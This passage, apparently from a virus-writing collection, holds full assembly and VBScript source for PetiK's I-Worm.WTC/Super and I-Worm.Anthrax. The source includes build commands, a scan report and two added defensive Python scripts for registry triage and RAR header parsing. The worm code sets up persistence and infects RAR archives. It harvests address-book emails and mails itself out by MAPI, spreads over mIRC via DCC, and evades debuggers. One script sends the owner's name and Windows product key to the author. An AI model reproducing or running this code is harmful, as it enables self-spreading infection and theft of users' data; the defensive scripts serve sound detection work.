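    """Case-insensitive key lookup; returns the value dict or {}."""
    for k, values in reg.items():
        if k.lower() == key.lower():
            return values
    return {}


def check_run_key(reg):
    """Run values whose name and target binary match the worm's persistence entry."""
    findings = []
    for name, data in _lookup(reg, RUN_KEY).items():
        target = RUN_VALUES.get(name.lower())
        if target and ntpath.basename(str(data)).lower() == target:
            findings.append(("persistence", f"{RUN_KEY}\\{name} -> {data}"))
    return findings


def check_ie_pages(reg):
    """IE start/search/local pages pointing at one of the worm URLs."""
    findings = []
    for name, data in _lookup(reg, IE_MAIN_KEY).items():
        if name.lower() in IE_VALUES and str(data).lower().rstrip("/") in HIJACK_URLS:
            findings.append(("browser-hijack", f"{name} = {data}"))
    return findings


def check_marker(reg):
    """Passion creates this key after mailing the victim's details once, so its
    presence alone shows the information-gathering branch already ran."""
    if any(k.lower() == MARKER_KEY.lower() for k in reg):
        return [("marker", MARKER_KEY)]
    return []


def check_files(paths):
    """Dropped files, matched on the base name only (the directory varies per host)."""
    return [("dropped-file", p) for p in paths if ntpath.basename(p).lower() in DROPPED_NAMES]


def triage(reg, paths):
    """Run every check and return the combined list of (category, detail) findings."""
    return check_run_key(reg) + check_ie_pages(reg) + check_marker(reg) + check_files(paths)


# Constructed snapshot of an infected host (illustrative values, not real data).
SAMPLE_REG = {
    RUN_KEY: {
        "MsVbdll": r"C:\WINDOWS\SYSTEM\MsVbdll32.exe",
        "ctfmon.exe": r"C:\WINDOWS\SYSTEM32\ctfmon.exe",      # benign entry, must not match
    },
    IE_MAIN_KEY: {
        "Start Page": "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm",
        "Search Page": "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm",
        "Local Page": r"C:\WINDOWS\SYSTEM\blank.htm",             # untouched value
    },
    MARKER_KEY: {},
}
SAMPLE_FILES = [r"C:\WINDOWS\AllMail.txt", r"C:\WINDOWS\win.ini", r"C:\passion.vbs"]

if __name__ == "__main__":
    for category, detail in triage(SAMPLE_REG, SAMPLE_FILES):
        print(f"[{category}] {detail}")
```

On a live host the dict is filled from a registry export parsed into the same shape; comparisons are case-insensitive because the worms write paths and value names with whatever case the system returned, and the URL match strips a trailing slash that some IE builds append.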

comment #
Name : I-Worm.WTC (aka : I-Worm.Super -> It was the first worm's name.)
Author : PetiK
Date : September 11th (A great day that we don't forget all around the world) - October 11th
Size : 8704 byte (compiled with upx tool)
Action :
* Copy itself to WINDOWS\SYSTEM\Visual8.exe
* Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Visual Debugger = WINDOWS\SYSTEM\Visual8.exe
It infects all RAR files in the Personal directory.
It creates C:\wrm.vbs. This file searches for and stores all emails in the WAB in the file C:\email.mel. It waits 2 sec. and deletes the vbs file.
When the current day is the 11th it displays a messagebox.

Note of the author.
------------------
After the terrible terrorist attacks, I wanted to do something. I can't destroy the computers to show my anger. It's a stupid reaction. I wanted to warn people to help to find the authors of these attacks. And I wanted to help myself. The target of this worm is not to spread to infect other computers but to help the FBI, etc... in their investigation.

To delete the worm :
@echo off
del %windir%\SYSTEM\Visual8.exe
attrib -H C:\email.mel
del C:\email.mel

To build the worm :
@echo off
tasm32 /ml /m9 WTC
tlink32 -Tpe -c -x -aa WTC,,,import32,dllz
upx -9 WTC.exe
if exist *.obj del *.obj
if exist *.map del *.map
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: call twin_worm: push mov push push api mov push push push api add mov stosd mov call hide_worm mess_worm 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"siV\" eax,"8lau"

stosd mov eax,"exe." stosd pop edi push push push api 0 edi esi CopyFileA

push 15 push edi push 1 @pushsz "Visual Debugger" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA special_folder: pushad push 0 push 5 push offset personal push 0 api SHGetSpecialFolderPathA push offset personal api SetCurrentDirectoryA call get_worm_crc find_first_rar: push offset Search @pushsz "*.rar" api FindFirstFileA inc eax je find_close_rar dec eax mov [hSearch],eax i_r: call infect_rar push offset Search push [hSearch] api FindNextFileA test eax,eax jne i_r find_close_rar: push [hSearch] api FindClose end_virtual: push 8000h push 0 push [worm_main] api VirtualAlloc end_all_rar: popad call vbs_file push 2 or 20h @pushsz "C:\email.mel" api SetFileAttributesA 0 offset inet InternetGetConnectedState eax verif_inet

verif_inet: push push api dec jnz

open_scan_mail: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "C:\email.mel" api CreateFileA inc eax

je dec xchg xor push push push push push push api test je xchg xor push push push push push api test je xchg push push api cmp jbe

end_spread eax eax,ebx eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_s2 eax,esi 0 ebx GetFileSize eax,3 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"%" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_s3: api end_s2: api end_s1: api end_spread: popad push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle

start_page: pushad mov edi,offset sinet

call sinet_size dd 160 sinet_size: push edi call reg dd 1 reg: @pushsz "Start Page" @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h api SHGetValueA call @web db "http://stcom.net/",0 db "http://stcom.net/default2.htm",0 db "http://stcom.net/qoqazfr",0 db "http://stcom.net/kavkoz",0 db "http://stcom.net/falestine",0 db "http://stcom.net/oulamah",0 db "http://stcom.net/Oulamah",0 db "http://stcom.net/An-Nissa",0 db "http://stcom.net/ahghanistan",0 db "http://www.alesteqlal.com/",0 @web: pop esi push 10 pop ecx w_loop: push ecx push esi push offset sinet api lstrcmp test eax,eax jnz continue call alert_fbi jmp end_web continue: @endsz pop ecx loop w_loop end_web: popad end_worm: push api 0 ExitProcess

hide_worm: pushad @pushsz "Kernel32.dll" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret mess_worm: pushad push offset SystemTime api GetSystemTime cmp [SystemTime.wDay],04h jne end_mess push 40h @pushsz "I-Worm.Super coded by PetiK" call @txt db "Because of the different terrorism acts in the USA",0dh,0ah db "I don't will destroy your computer.",0dh,0ah,0dh,0ah db "If you have some informations about the authors or Ben Laden,",0dh,0ah db 9,"PLEASE CONTACT THE FBI",0

@txt: push 0 api MessageBoxA end_mess: popad ret get_worm_crc Proc pushad push 0 push 80h push 3 push 0 push 0 push 80000000h push offset copy_worm api CreateFileA inc eax je end_all_rar dec eax mov [hFile],eax push push api mov mov mov push push push push push api test pop je xchg mov push push push push push push api pop mov call mov 0 eax GetFileSize [filesize],eax [RARCompressed],eax [RAROriginal],eax eax 4 1000h or 2000h eax 0 VirtualAlloc eax,eax edx end_file eax,ebx [worm_main],ebx edx 0 offset tmp edx ebx [hFile] ReadFile edi esi,ebx CRC32 [RARCRC32],eax

end_file: push [hFile] api CloseHandle popad ret get_worm_crc EndP CRC32 Proc push ecx push edx push ebx xor ecx,ecx dec ecx mov edx,ecx nxt_byte_crc: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 nxt_bit_crc:

shr rcr jnc xor xor no_crc: dec jnz xor xor dec jne not not pop mov rol mov pop pop ret CRC32 EndP

bx,1 ax,1 no_crc ax,08320h bx,0EDB8h dh nxt_bit_crc ecx,eax edx,ebx edi nxt_byte_crc edx ecx ebx eax,edx eax,16 ax,cx edx ecx

infect_rar Proc pushad push offset Search.cFileName api GetFileAttributesA cmp eax,1 je end_inf push 0 push 80h push 3 push 0 push 0 push 80000000h or 40000000h push offset Search.cFileName api CreateFileA inc eax je end_inf dec eax xchg eax,ebx push push push push api mov push pop call mov 2 0 0 ebx SetFilePointer esi,offset RARHeaderCRC+2 end_RAR-RARHeader-2 edi CRC32 [RARHeaderCRC],ax

;calculate CRC32 of rar header

push 0 push offset tmp push end_RAR-RARHeader call end_RAR RARHeader: RARHeaderCRC dw 0 RARType db 74h RARFlags dw 8000h RARHSize dw end_RAR-RARHeader RARCompressed dd 2000h RAROriginal dd 2000h RAROS db 0 RARCRC32 dd 0 RARFileDateTime dd 12345678h RARNeedVer db 14h RARMethod db 30h RARFNameSize dw end_RAR-RARName RARAttrib dd 0 RARName db 'SUPER.EXE' end_RAR:push ebx api WriteFile ;write the rar header push push push 0 offset tmp [filesize]

push push api push api

[worm_main] ebx WriteFile ebx CloseHandle

;write the worm ;close the file

push 1 push offset Search.cFileName api SetFileAttributesA end_inf:popad ret infect_rar EndP vbs_file Proc pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\wrm.vbs" api CreateFileA xchg eax,ebx

;set already-infected mark

push 0 call @tmp dd ? @tmp: push e_vbs - s_vbs call e_vbs s_vbs: db 'On Error Resume Next',CRLF db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set O=CreateObject("Outlook.Application")',CRLF db 'Set M=O.GetNameSpace("MAPI")',CRLF db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF db 'mel.Close',CRLF db 'For Each N In M.AddressLists',CRLF db 'If N.AddressEntries.Count <> 0 Then',CRLF db 'For c=1 To N.AddressEntries.Count',CRLF db 'Set P=N.AddressEntries(c)',CRLF db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF db 'mel.WriteLine P.Address',CRLF db 'mel.Close',CRLF db 'Next',CRLF db 'End If',CRLF db 'Next',CRLF db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF db 'mel.WriteLine "%"',CRLF db 'mel.Close',CRLF e_vbs: push ebx api WriteFile push ebx api CloseHandle push 1 @pushsz "wscript C:\wrm.vbs" api WinExec push 5000 api Sleep @pushsz "C:\wrm.vbs" api DeleteFileA popad ret vbs_file EndP send_mail: xor push push push push push api ret alert_fbi: eax,eax eax eax offset MsgWrm eax [hMAPI] MAPISendMail

@pushsz "C:\information.txt" push offset sinet @pushsz "Start Page of MSIE" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA mov edi,offset names call name_size dd 160 name_size: push edi call reg2 dd 1 reg2: @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h api SHGetValueA @pushsz "C:\information.txt" push offset names @pushsz "Name of the suspect" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA push 50 push offset Systemini api GetWindowsDirectoryA @pushsz "\Win.ini" push offset Systemini api lstrcat push offset Systemini push 20 push offset org_pays push offset default @pushsz "sCountry" @pushsz "intl" api GetPrivateProfileStringA @pushsz "C:\information.txt" push offset org_pays @pushsz "Country of the suspect" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA xor eax,eax push eax push eax push offset MsgFbi push eax push [hMAPI] api MAPISendMail push 30000 api Sleep @pushsz "C:\information.txt" api DeleteFileA ret .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) rar_worm db 50 dup (0) ; === rar_files === personal db 50 dup (0) worm_main dd ? tmp dd ? filesize dd ? hFile dd ? hSearch dd ? ; === scan_mail === mail_addr db 128 dup (?) hMAPI dd 0 inet dd 0 ; === information ===

sinet names Systemini org_pays default

dd dd db db

0 0 50 dup (0) 20 dup(0) db 0 === db "C:\information.txt",0 db "newyork@fbi.gov",0 "WARNING ABOUT DJIHAD AND PERHAPS BENLADEN !",0 db "This is a mail written by a worm called " "I-Worm.WTC coded by PetiK.",CRLF "The reason to receive this sort of mail is that the " "worm has found in the somebody's computer the link " "to http://stcom.net or other site web dealing with the djihad.",CRLF,CRLF "You can see some informations about this person with Start Page " "of MSIE, registered owner and the country.",CRLF,CRLF "I hope that it help you in your investigations about the " "terrorist attacks in NYC and Washington DC.",CRLF,CRLF 9,9,"Worm.WTC - PetiK",0

; === gen_mail infofbi mailfbi subjectfbi db bodyfbi db db db db db db db db db subjectwrm bodywrm name_mail MsgFbi dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd dd MsgToFbi dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd MsgToWrm

db "Everybody against the terrorists !",0 db "This freeware will help us to fight the terrorist " db "who kill innocent civilians.",CRLF,CRLF db 9,"Click at the attached file to see.",00h db "StopTerrorists.exe",00h dd ? offset subjectfbi offset bodyfbi ? ? ? 2 offset MsgFrom 1 offset MsgToFbi 1 offset AttachFbi dd ? ? ? ? ? ? ? 1 ? offset mailfbi ? ? ? ? ? offset infofbi ? ? dd ? offset subjectwrm offset bodywrm ? ? ? 2 offset MsgFrom 1 offset MsgToWrm 1 offset AttachWrm

AttachFbi

MsgWrm

dd ?

dd dd dd dd dd AttachWrm dd dd dd dd dd dd

1 ? offset mail_addr ? ? ? ? ? offset orig_worm offset name_mail ?

signature author end start end SUPER.VBS

db "I-Worm.WTC",00h db "Coded by PetiK - 2001",00h

On Error Resume Next Set ws=CreateObject("WScript.Shell") verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\") If verif <> "send" Then ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") Set OA=CreateObject("Outlook.Application") Set EM=OA.CreateItem(0) EM.To="petik@multimania.com" EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com" EM.Subject="I am infected by I-Worm.Super !!" body="My name is " & ro1 & "," body = body & VbCrLf & "I was infected by I-Worm.Super :-(" body = body & VbCrLf & "It was on "& date & " at " & time & "." body = body & VbCrLf & "" body = body & VbCrLf & "If you want some informations about me :" body = body & VbCrLf & "My registered owner : " & ro1 body = body & VbCrLf & "My registered organization : " & ro2 body = body & VbCrLf & "My Product Key : " & pk body = body & VbCrLf & "My Product Indentification : " & pi body = body & VbCrLf & "My version of Windows : " & ver & " " & vern body = body & VbCrLf & "My start page of MSIE : " & sp body = body & VbCrLf & "My country : " & ld body = body & VbCrLf & "" body = body & VbCrLf & "Please help me !" body = body & VbCrLf & "Thank you very much." EM.Body=body EM.DeleteAfterSubmit=True EM.Send ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send" End If

File WTC.exe received on 05.16.2009 20:03:13 (CET)
Antivirus : a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version : 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update : 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result : Email-Worm.Win32.Petik!IK Win32/PetTick.8704.C Worm/Petik.Gen Worm/Win32.Win32 W32/Malware!2e38 Win32:Petik-WTC I-Worm/Petik.M Generic.Malware.SMsp!g.852A5C9B Worm.WTC Worm.Win32.Petik.U Win32.Petik.12288 Win32.Petik Win32/Petik.8704.C W32/Malware!2e38 Email-Worm.Win32.Petik W32/PetTick@mm Generic.Malware.SMsp!g.852A5C9B Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!2FB45484ACDD Worm.Petik.Gen Worm:Win32/PetTick.L@mm Win32/Petik.U W32/Pet_Tick.8704.D W32/Petik I-Worm.Petik.J1 Medium Risk Malware Worm.Petik.GEN W32/Petik-WTC Worm.Petik W95.Pet_Tick.gen W32/Petik WORM_PET.TICK.Q Win32.Worm.WTC I-Worm.Win32.PetTick.8704.C I-Worm.Petik.J1

Additional information
File size: 8704 bytes
MD5...: 2fb45484acdd0ec3a4f7f199b13e2262
SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
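The WTC infection routine above appends a stored SUPER.EXE entry to every RAR file in the Personal folder, writing the file header laid out at RARHeader..end_RAR and checksumming it with the bit-serial CRC32 Proc (polynomial EDB88320h, initial and final value FFFFFFFFh, only the low 16 bits kept for RARHeaderCRC). As an added example for defenders, not PetiK's code, the script below parses that RAR 2.x header layout, recomputes the 16-bit header CRC with the same algorithm, and flags entries whose checksum fails or that are a stored (method 30h) executable, which is the shape of entry the routine adds. The archive it inspects is assembled inside the script from constructed bytes; no real sample is involved, and all function names are mine.

```python
"""
Parser for the RAR 2.x file-header layout used by the WTC source on this page,
with the header checksum recomputed by the same bit-serial CRC-32 as the page's
CRC32 Proc.  Added defender-side example, not PetiK's code.  The archive bytes
are constructed by build_sample_archive(); nothing here is a real sample.
"""
import struct
import zlib

HEAD_FILE = 0x74            # RARType of a file header
METHOD_STORE = 0x30         # RARMethod: data stored uncompressed
BASIC = struct.Struct("<HBHH")           # RARHeaderCRC, RARType, RARFlags, RARHSize
FILE_REST = struct.Struct("<IIBIIBBHI")  # RARCompressed .. RARAttrib, then RARName


def crc32_bitwise(data, crc=0xFFFFFFFF):
    """CRC-32 one bit at a time, as the page's CRC32 Proc does (result is NOTed)."""
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xEDB88320 if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def self_check():
    """True when the bit-serial routine matches zlib and the standard check value."""
    samples = [b"", b"123456789", bytes(range(256))]
    return (crc32_bitwise(b"123456789") == 0xCBF43926
            and all(crc32_bitwise(s) == zlib.crc32(s) & 0xFFFFFFFF for s in samples))


def walk_blocks(blob):
    """Return one dict per file header; marker and main headers are skipped by size."""
    entries, offset = [], 0
    while offset + BASIC.size <= len(blob):
        head_crc, head_type, flags, head_size = BASIC.unpack_from(blob, offset)
        if head_size < BASIC.size:           # corrupt size would loop forever
            break
        add_size = 0
        if head_type == HEAD_FILE and offset + BASIC.size + FILE_REST.size <= len(blob):
            (packed, unpacked, _os, file_crc, _ftime, _ver, method,
             name_size, attrib) = FILE_REST.unpack_from(blob, offset + BASIC.size)
            name_off = offset + BASIC.size + FILE_REST.size
            name = blob[name_off:name_off + name_size].decode("latin-1")
            # RAR keeps the low 16 bits of the CRC over the header after the CRC field.
            computed = crc32_bitwise(blob[offset + 2:offset + head_size]) & 0xFFFF
            data = blob[offset + head_size:offset + head_size + packed]
            entries.append({
                "name": name, "method": method, "attrib": attrib,
                "packed": packed, "unpacked": unpacked,
                "crc_ok": head_crc == computed,
                "data_crc_ok": crc32_bitwise(data) == file_crc,
                "stored_exe": method == METHOD_STORE and name.upper().endswith(".EXE"),
            })
            add_size = packed
        elif flags & 0x8000 and offset + BASIC.size + 4 <= len(blob):
            add_size = struct.unpack_from("<I", blob, offset + BASIC.size)[0]
        offset += head_size + add_size
    return entries


def flag_entries(blob):
    """(name, reason) pairs for the entries a defender would look at first."""
    flagged = []
    for e in walk_blocks(blob):
        if not e["crc_ok"]:
            flagged.append((e["name"], "bad header CRC"))
        if e["stored_exe"]:
            flagged.append((e["name"], "stored executable"))
    return flagged


def build_file_block(name, data, method=METHOD_STORE, attrib=0x20):
    """Assemble one file header plus stored data with a correct header CRC."""
    body = FILE_REST.pack(len(data), len(data), 0, crc32_bitwise(data),
                          0x12345678, 0x14, method, len(name), attrib)
    body += name.encode("latin-1")
    rest = BASIC.pack(0, HEAD_FILE, 0x8000, BASIC.size + len(body))[2:] + body
    return struct.pack("<H", crc32_bitwise(rest) & 0xFFFF) + rest + data


def build_sample_archive():
    """Constructed two-entry archive: a text file plus a stored SUPER.EXE-style entry."""
    marker = b"Rar!\x1a\x07\x00"                            # marker block, 7 bytes
    main_rest = struct.pack("<BHHHI", 0x73, 0, 13, 0, 0)    # main header, 13 bytes
    main = struct.pack("<H", crc32_bitwise(main_rest) & 0xFFFF) + main_rest
    notes = build_file_block("notes.txt", b"quarterly figures\r\n")
    fake_exe = b"MZ" + b"\x90" * 62                         # placeholder bytes, not a real PE
    dropper = build_file_block("SUPER.EXE", fake_exe, attrib=0)
    return marker + main + notes + dropper


if __name__ == "__main__":
    assert self_check()
    for name, reason in flag_entries(build_sample_archive()):
        print(f"{name}: {reason}")
```

self_check() compares the bit-serial routine with zlib.crc32, which implements the same reflected CRC-32, so they agree on every input; keeping only the low word for the header field is exactly what the `mov [RARHeaderCRC],ax` in infect_rar does, which is why a single flipped byte anywhere in a header shows up as a CRC mismatch in walk_blocks.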

comment #
Name : I-Worm.Anthrax (aka : I-Worm.Fi)
Author : PetiK
Date : October 11th - November 6th
Size : 6144 byte (compiled with UPX tool)
Action :
* Copy itself to WINDOWS\SYSTEM\MsSys32.exe
* Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Microsoft System = WINDOWS\SYSTEM\MsSys32.exe
The virus uses anti-* against SoftICE
It creates a file to go to a web site about the anthrax. On the Desktop if it can or else on the c:\ root.
It creates in some directories a script to be able to spread with mIRC :
-C:\mirc
-C:\mirc32
-C:\progra~1\mirc
-C:\progra~1\mirc32
To spread, it uses the MAPI mechanism with the 10 first emails found in the WAB.

To delete the worm : Look at the file Delete_Fi.vbs

To build the worm :
@echo off
tasm32 /ml /m9 Anthrax
tlink32 -Tpe -c -x -aa Anthrax,,,import32,dllz
upx -9 Anthrax.exe
if exist *.obj del *.obj
if exist *.map del *.map

Notes of the author:
The worm bugs at the end of its WAB spread.
I want to thank Benny very much. I learnt a lot of things while looking at his different codes (XTC, HiV and Universe).
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: twin_worm: push mov push push api mov push push push api add mov stosd mov stosd 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"SsM\" eax,"23sy"

; esi = name of file

mov eax,"exe." stosd pop edi push push push api test je 1 edi esi CopyFileA eax,eax end_twin

; edi = %system%\MsSys32.exe

; copy itself ; already copy ??

push 20 push edi push 1 @pushsz "Microsoft System" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA ; regedit mess: push 1040h @pushsz "Microsoft Windows" call @txt db "You must be connected to run this file.",CRLF,CRLF db "If it's not the case, please connect you.",0 @txt: push 0 api MessageBoxA ; fake message end_twin: call e_sr: call call call verif_inet: push push api dec jnz hide_worm create_url spread_mirc 0 offset inet InternetGetConnectedState eax verif_inet debug

spread_wab: pushad srch_wab: mov edi,offset wab_path push offset wab_size push edi push offset reg push 0 @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" push 80000001h api SHGetValueA push push push push push push push api inc je dec xchg push push push push push push api test je 0 0 3 0 1 80000000h offset wab_path CreateFileA eax end_srch_wab eax ebx,eax 0 0 0 2 0 ebx CreateFileMappingA eax,eax end_wab1

; The name of WAB file

xchg push push push push push api test je xchg

eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_wab2 eax,esi

mov verif,0 d_scan_mail: call @smtp db 'SMTP',00h,1Eh,10h,56h,3Ah @smtp: pop edi s_scan_mail: pushad push 9 pop ecx rep cmpsb popad je scan_mail inc esi loop s_scan_mail end_wab3: push esi api UnmapViewOfFile end_wab2: push ebp api CloseHandle end_wab1: push ebx api CloseHandle end_srch_wab: popad end_worm: push api 0 ExitProcess

; the string what we want to find

create_url: ; This routine has perhaps bug on WinNT/2k pushad desktop_url: @pushsz "SHELL32.dll" api LoadLibraryA mov ebx,eax @pushsz "SHGetSpecialFolderPathA" push ebx api GetProcAddress test eax,eax jz on_hd mov ebp,eax push 0 push 0 ; DESKTOP push offset desktop push 0 call ebp @pushsz "\Anthrax_Info.url" push offset desktop api lstrcat mov esi,offset desktop jmp c_sys on_hd: @getsz "C:\Anthrax_Info.url",esi c_sys: push 50 push offset shelldir api GetSystemDirectoryA @pushsz "\Shell32.dll" push offset shelldir api lstrcat cr_url: push esi @pushsz "http://www.anthrax.com"

@pushsz "URL" @pushsz "InternetShortcut" api WritePrivateProfileStringA push esi @pushsz "23" @pushsz "IconIndex" @pushsz "InternetShortcut" api WritePrivateProfileStringA push esi push offset shelldir @pushsz "IconFile" @pushsz "InternetShortcut" api WritePrivateProfileStringA end_url: push ebx api FreeLibrary popad ret debug Proc pushad mov eax,fs:[20h] test eax,eax je $+4 kill: int 19h api IsDebuggerPresent test eax,eax jne kill push 0 push 80h push 3 push 0 push 0 push 40000000h or 80000000h @pushsz "\\.\SICE" api CreateFileA inc eax jne kill push 0 push 80h push 3 push 0 push 0 push 40000000h or 80000000h @pushsz "\\.\NTICE" api CreateFileA inc eax jne kill popad ret debug EndP hide_worm Proc pushad @pushsz "KERNEL32.dll" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP spread_mirc Proc push 50 push offset mircspread

; CD19

; SOFTICE driver win98

; SOFTICE driver winNT/2k

; Registered as Service Process

api GetSystemDirectoryA @pushsz "\MsSys32.exe" push offset mircspread api lstrcat pushad call @mirc db 'C:\mirc\script.ini',0 db 'C:\mirc32\script.ini',0 db 'C:\progra~1\mirc\script.ini',0 db 'C:\progra~1\mirc32\script.ini',0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov [hmirc],eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push [hmirc] api WriteFile push [hmirc] api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: popad ret spread_mirc EndP scan_mail: xor edx,edx add esi,21 mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,00h je f_mail cmp al,"@" jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c f_mail: xor al,al stosb pop edi test edx,edx je d_scan_mail call send_mail cmp verif,10 je end_worm jmp d_scan_mail send_mail: inc verif pushad @pushsz "MAPI32.DLL" api LoadLibraryA xchg ebx,eax mapi macro x

; spread with mIRC. Thanx to Microsoft.

push push api mov endm mapi mapi mapi

offset sz&x ebx GetProcAddress x,eax MAPILogon MAPISendMail MAPILogoff

mapi_logon: xor eax,eax push offset hMAPI push eax push eax push eax push eax push eax call MAPILogon test eax,eax jne end_send_mail mapi_send_mail: xor eax,eax push eax push eax push offset MsgWrm push eax push [hMAPI] call MAPISendMail mapi_logoff: xor eax,eax push eax push eax push eax push [hMAPI] call MAPILogoff push ebx api FreeLibrary end_send_mail: popad ret .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === url_info === desktop db 50 dup (0) shelldir db 50 dup (0) hurl dd ? ; === spread_mirc === byte_write dd ? hmirc dd ? s_mirc: db '[script]',CRLF db 'n0=on 1:JOIN:{',CRLF db 'n1= /if ( $nick == $me ) { halt }',CRLF db 'n2= /.dcc send $nick ' mircspread db 50 dup (0) db CRLF,'n3=}',0 e_mirc: ; === spread_wab === inet dd 0 wab_path db 100 dup (0) wab_size dd 100 reg dd 1 verif dd ? ; === scan_mail === mail_addr db 128 dup (?)

; === spread_mail szMAPISendMail szMAPILogon szMAPILogoff MAPISendMail MAPILogon MAPILogoff hMAPI

=== db "MAPISendMail",0 db "MAPILogon",0 db "MAPILogoff",0 dd dd dd dd ? ? ? 0

